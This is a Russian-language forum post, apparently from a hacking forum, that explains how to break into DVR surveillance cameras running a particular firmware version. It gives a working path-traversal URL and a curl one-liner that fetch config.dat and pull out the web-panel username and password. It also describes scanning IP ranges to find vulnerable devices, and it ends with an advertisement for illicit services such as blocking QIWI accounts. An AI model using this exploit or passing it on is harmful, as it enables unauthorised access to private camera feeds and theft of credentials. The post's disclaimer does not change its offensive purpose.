Взлом и получение доступа к камерам наблюдения

Тема в разделе "Сборник статей по безопасности и анонимности", создана пользователем Hermanicus, 20 мар 2017.

  1. Всем привет, хочу донести до Вас информацию, может и есть в открытом доступе но она не расписана и не разжёванная. Сейчас очень много приходит информации о взломанных камерах наблюдениях, в банках, в учреждениях, даже на Украине на донбасе в последние время начали в мелькать подобные сообщения.

    [​IMG]


    Информация

    Для начала, посмотрим на саму уязвимость, она была виставлена на с тайтлом , — регистратор на 16 камер + 2 выхода на аудио, на котором стоит прошивка 3.2.0.P-3520A-00, и другие устройства с этой прошивкой. Атакующий может получить доступ к файлам конфигурации, таких как config.dat, где находится инфа для входа в веб интерфейс.

    Адрес где лежит конфигурационный файл.

    http://[IP ADDRESS]/../../../mnt/mtd/config/config.dat
    1
    http://[IP ADDRESS]/../../../mnt/mtd/config/config.dat
    Парсинг

    Именно для меня на данный момент такой способ парсинга самый актуальный.
    Использую я Advanced IP Scanner — линк на офф

    Сам сканер. Выбран диапазон IP. Нас интересует шапка DVR Components Download

    [​IMG]

    Вот такой вид имеет панель входа.

    [​IMG]

    Вот код самого експлойта

    curl http://[IP Address]/../../../mnt/mtd/config/config.dat 2>/dev/null | strings
    1
    curl http://[IP Address]/../../../mnt/mtd/config/config.dat 2>/dev/null | strings
    Вот пример

    [​IMG]

    Ну и все в итоге у нас юзер и пасс от панели

    [​IMG]

    Maybe End

    Все очень и очень просто.
    Есть еще поисковик через который тоже можно искать камеры.
    Предлагаю услуги по:
    1. Сделаю зеркало любого сайта в сети ТОR
    2. Блокировка ЛЮБОГО QIWI Номера (Быстро)


    [​IMG]
    Мануалы и софт выложены в ознакомительных целях вся ответственность за использования ложится на вас.
    Софт советую использовать на виртуалке.
     

Поделиться этой страницей